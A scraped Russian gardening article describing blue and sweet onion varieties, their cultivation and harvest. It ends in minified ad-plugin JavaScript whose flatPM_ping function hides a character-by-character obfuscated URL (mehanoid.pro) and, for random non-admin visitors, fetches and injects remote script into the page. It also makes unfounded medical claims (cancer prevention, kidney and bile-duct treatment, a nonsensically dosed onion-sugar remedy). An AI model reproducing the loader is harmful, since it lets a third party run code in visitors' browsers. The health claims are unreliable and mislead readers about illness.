  3. Верхушка репки сухая.

Все это свидетельствует о качестве покупаемого продукта.

Преимущества и недостатки

У синего лука большое количество преимуществ, среди которых хочется выделить следующие:

  • высокая урожайность;
  • крупные головки;
  • отличные вкусовые качества;
  • универсальность в применении;
  • лежкость;
  • устойчивость против болезней.

Следует отметить и полезные качества овоща для человеческого организма. В первую очередь, нужно обратить внимание на химический состав овоща, который значительно отличается от других видов. Самое большое скопление полезных веществ именно в верхних слоях лука. Поэтому при чищении нужно быть аккуратным и не снимать верхние шары, иначе можно погубить большое количество минералов и витаминов.

Интересный факт. Во время приготовления лука в пищу и его термической обработки все полезные качества овоща полностью сохраняются.

При употреблении синего лука человек получает необходимое количество антиоксидантов, благодаря которым организм омолаживается, клетки тканей восстанавливаются, перестают преждевременно отмирать. Данный овощ –хорошее средство для профилактики заболевания онкологическими болезнями. Также сиреневый лук противостоит воспалительным процессам в организме и укрепляет иммунную систему.

Синий лук применяется для лечения почечных болезней. Для того чтобы очистить желчные протоки, нужно воспользоваться приготовленной луковичной смесью с сахаром. Ниже представлено описание рецепта.

Синий лук применяется для лечения почечных болезней

Необходимо взять полкилограмма пурпурного лука и стакан сахарной пудры. Лук измельчается, закладывается в посуду с пудрой. Тщательно перемешивается и ставится в духовку. Как только смесь станет золотистого цвета, ее вынимают и студят. Принимают по двадцать миллиграмм трижды в день за тридцать минут до еды.

К недостаткам синего лука можно отнести лишь неудобный способ посадки и требовательность в уходе. Помимо этого ничего негативного о данном овоще сказать нельзя, но он может принести вред людям, у которых имеются язвенные заболевания.

Чтобы посадить лук севок, выбирают лучшие сорта для Подмосковья, среди которых следует отметить:

Синий вид лука стал популярным среди населения России, в первую очередь, за полезные качества для организма. Кроме того многие его оценили за лежкость при хранении и отличный товарный вид.

Лучшие сорта сладкого лука

Сладкий лук отличается вкусом – он не такой горький, как обычный, при чистке и во время нарезки не приводит к слезотечению. Также он крупнее и мясистее, чем другие сорта. В овоще меньше серосодержащих эфирных масел, которые придают остроту. При этом сохраняется вся польза – кроме витаминов и микроэлементов в мякоти содержатся летучие фитонциды, защищающие от вирусов.

Популярные сорта сладкого лука

Салатный лук можно разделить по разным параметрам – методам возделывания, регионам произрастания, по характеру ветвления и сроку созревания. Также разделяют культуру по цвету кожуры:

  1. К самым популярным сортам белого лука относят Глобо, Комета, Испанский 313.
  2. С красной кожурой востребованы такие разновидности – Багровый мяч, Грейтфул, Кампилло, Ретро, Чёрный принц.

Эти сорта имеют сладкий привкус, отличаются лёжкостью без утраты внешнего вида и хорошими вкусовыми параметрами. В основном в этой категории встречаются раннеспелые сорта, первый урожай которых можно снимать уже через три месяца с момента посадки.

Сорта для средней полосы

Сладкие сорта лука для средних широт отличаются неприхотливостью в культивировании, могут переносить кратковременные заморозки. В средней полосе и Подмосковье растут как раннеспелые и среднеспелые, так и позднеспелые виды.

Арзамасский

Оптимальный для средней полосы сорт, рекомендуют культивировать в двулетней культуре из севка. Описание:

  • форма округлая, масса одной луковицы до 70 г;
  • сухая чешуя коричневатого оттенка, в молодом возрасте – белая;
  • среднеспелый вид – сбор через 70-85 суток;
  • урожайность с одного квадратного метра участка – от 1,5 до 3 кг.

К заболеваниям эта разновидность устойчива, более восприимчива к ложной мучнистой росе. Хорошо лежит в зиму, до начала уборки вызревает до 96 % урожая.

Комета F1

Универсальный салатный лук с привлекательным внешним видом и простыми способами культивирования. Адаптирован к различным широтам, в том числе к средней полосе. Описание:

  • сбор урожая наступает на 110-125 сутки от всходов, поэтому собирать его с грядки можно до прихода дождей;
  • оптимальные показатели качества и вкуса;
  • мякоть сочная, кожица белая, структура луковицы плотная;
  • в зиму лежит более полугода;
  • есть хорошая устойчивость к фузариозу, розовой гнили.

Наружная чешуя сочная, толстая. Урожай высокий, дружная всхожесть посадочного материала. В кулинарии можно применять как в свежем виде, так и после термической обработки.

Испанский 313

Испанский репчатый лук – позднеспелый сорт универсального предназначения. С успехом культивируется в средней полосе, Подмосковье России, Молдове, Белоруссии, Украине. Устойчив к холоду, болезням, имеет приемлемые товарные и вкусовые показатели. Описание характеристик:

  • луковица плотная, снаружи белая, круглая форма;
  • мякоть белая, сладко-острая;
  • сбор урожая можно начинать через 110-130 суток после всходов;
  • пригоден для выращивания как в открытом грунте, так и в теплицах;
  • уборку проводят не раньше июля-августа;
  • с одного квадратного метра участка можно собрать от 2,5 до 4,5 кг, что является достаточно высоким параметром урожайности для луковой культуры.

До начала уборки созревает от 55 до 100 % урожая в зависимости от условий культивирования. В кулинарии применяется для приготовления блюд, в свежем виде.

Экстаз

Салатный лук – среднеранний сорт, не имеет ограничений по региональному культивированию. Рекомендуют возделывать в виде однолетней культуры методом посева семян, подходит для разведения на фермерских, приусадебных и огородных участках. Выращивание рассады – основной метод возделывания, при котором луковицы набирают максимальную массу. Они округлые, с нежным сладким привкусом, крупные.

  • сухая чешуя светло-желтого оттенка, легко отделяется;
  • отличается высокой способностью к зимнему хранению;
  • с одного квадратного метра можно собрать до 6 кг урожая;
  • масса одной луковицы достигает в среднем 150 г при безрассадном варианте посева;
  • закладку посадочного материала начинают в апреле.

Эта разновидность ценится за приятный нежный вкус без остроты и горечи, широко применяется для салатов, в свежем виде.

Салатный лук, среднеспелый, готов к сбору урожая через 3,5-4 месяца от появления всходов. Выращивается в основном однолетней культурой методом посева семян. Описание:

  • луковица овальная, ровная, средняя масса 140-150 г, в мякоти содержится небольшое число сухих веществ;
  • внешняя сухая чешуя имеет светло-коричневый оттенок;
  • вкус сладкий, без горечи;
  • сбор с одного квадратного метра участка доходит до 10 кг, необходимо обеспечить постоянное поступление солнечного света и полив;
  • ценность сорта заключается в его устойчивости к разнообразным заболеваниям;
  • не подвержен влиянию неблагоприятных климатических условий – хорошо переносит засуху, дожди;
  • срок хранения в зиму небольшой – в среднем 3-4 месяца.

В кулинарии используют как в свежем виде в качестве добавки для салатов и закусок, так и для приготовления на пару, жарки.

Кэнди F1

Гибридная разновидность, которая имеет хорошие вкусовые качества и повышенную урожайность. Входит в группу самых ранних видов репчатого лука, сбор возможен уже через 85 суток после посадки. Описание:

  • кожура светло-желтая, золотистая, масса луковиц до 300-400 г;
  • форма ровная, круглая, шейка тонкая, верхняя сухая чешуя тонкая, легко счищается;
  • мякоть белая, со сладким вкусом, не содержит горечи;
  • при выращивании неприхотлив, возможна посадка семенами или через рассаду в открытый грунт;
  • подходит для салатов, в свежем виде, для переработки;
  • лежкость средней продолжительности, хранится максимум полгода.

Его используют для посадки не только в южных регионах, хотя именно здесь он показывает наибольшую урожайность, но и на северо-западе и в центральной полосе страны.

Каприкорн F1

Раннеспелый салатный лук, хорошо подходит для высадки в открытый грунт рассадой, устойчив к типичным болезням этой культуры, дает хороший урожай, имеет самый продолжительный срок хранения среди всех видов. Описание:

  • луковица округлая вытянутой формы, сухая верхняя кожура тёмно-желтая с оранжевым оттенком, тонкая;
  • до созревания проходит от 100 до 110 суток;
  • мякоть сочная, белая, без горечи, сладковатая;
  • устойчив к типичным болезням;
  • репки круглые, по 100 г и более;
  • подходит для длительного хранения.

Эта разновидность используется для рассадной технологии, урожай высокий, при внесении через месяц после посадки удобрений на основе кальция объем урожая повышается.

Выбор сладких сортов для Сибири

В сложных климатических условиях не все сорта репчатого лука могут показывать рост и достойный урожай. Для Сибири районированы следующие сорта:

  1. Сибирский однолетний. Отличается зимостойкостью, раннеспелый. Хранится всю зиму до следующего урожая. Луковицы крупные, плоскоугольной формы. Вкус с лёгкой остротой, масса репки при выращивании семенами до 150 г, при посадке севка – максимум 200 г. Урожайность до 2,5 кг с одного квадратного метра грунта, сбор возможен через 98 дней от посадки.
  2. Бессоновский местный. Луковицы небольшие, округлой формы, весом максимум 60 г. Чешуйки золотистые, тонкие, плотно облегают репку. Мякоть белая, сочная, вкус пикантный. Хранится длительно – до 9 месяцев.
  3. Стригуновский. Адаптируется к любым условиям климата, в том числе сибирским. Луковицы вытянутой овальной формы, весом максимум 60 г. Есть однолетники и двухлетняя культура. Масса одной репки увеличивается до 200 г, если выращивать методом севка. Созревает рано, можно собрать с одного квадратного метра до 3,5 кг урожая, лежит не менее полугода.

Разновидности, районированные для средних и северных широт, отличаются устойчивостью к засухе, вредителям. Мякоть у них более плотная, сока мало, кожура многослойная, прочная.

Бессновский местный Стригуновский Сибирский однолетний

Выращивание

Посадить лук сладкого сорта можно двумя способами:

  1. Через рассаду. Семена закладывают в почвосмесь в конце февраля – марте в зависимости от климатической зоны. Перед посевом их необходимо продезинфицировать раствором марганцовки светло-розового цвета, через 15 минут промыть водой. Покупные можно не дезинфицировать. Затем семена на 8 часов замачиваются в стимуляторах роста. В специальных или самостоятельно сделанных ящиках внизу на дне должны быть отверстия, под ящики ставится поддон. Внутрь на слой дренажа закладывается плодородный субстрат. Активированные семена закладываются в грунт, земля увлажняется. В мае рассаду можно переносить на грядки.
  2. Высадка в грунт семенами. Сроки высаживания – последняя декада апреля – начало мая. Купленные семена не нуждаются в обработке, собранные самостоятельно нужно обработать фунгицидами или раствором марганцовки. Посев на грядке проводят ленточным способом, оставляя ширину 1 м между полосами. Почва должна быть рыхлой. Глубина закладки семян – максимум 2 см. Затем борозды высыпаются, почва уплотняется, сверху выкладывается слой торфа или перегноя до 2 см толщиной. После этого полейте грядки так, чтобы не размыть высадку. Для ускорения роста поверхность земли можно прикрыть пленкой из полиэтилена, убрав ее после появления всходов.

Рассадный способ более трудоемкий, но позволяет получить крупные луковые репки большей массой, чем при методе выращивания из семян.

Уход за посадками

При выращивании лука сладких сортов уход несложен:

  • удаляйте сорную траву, иначе урожайность может снизиться на 50 % и более;
  • рыхлите почвенную корку;
  • прореживание посевов проводят, когда на всходах будет минимум 2 крупных листа;
  • полив – до 2 раз в неделю при сухой погоде;
  • опрыскивание удобрениями проводят за неделю до сбора урожая.

Полив прекращают с июня, когда идёт активное созревание луковиц. Если регулярно идут дожди, посадки можно и вовсе не увлажнять.

Уборка урожая

Урожай собирают, начиная со второй половины июля до первой декады августа, исходя из особенностей погоды. Ориентир – листья пожелтели на треть своей высоты. Убрать весь урожай необходимо до того, как начнется сезон дождей, и наступят заморозки.

Если позволяет температура воздуха, подсушите луковицы на грядке под прямыми лучами солнца (до 7-10 суток). После этого нужно обрезать корни, оставить шейку до 4 см длиной, разложить урожай на просушку в помещении с отоплением на 10 суток при температуре до +30 градусов.

Перед закладкой на хранение нужно рассортировать отдельно крупные луковицы, отдельно – мелкие, убрать подгнившие и испорченные вредителями.

Сладкий репчатый лук популярен у многих огородников, особенно ранние сорта. Он приятен на вкус, не такой острый, как другие варианты, подходит практически для любых блюд, в том числе в сыром виде.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};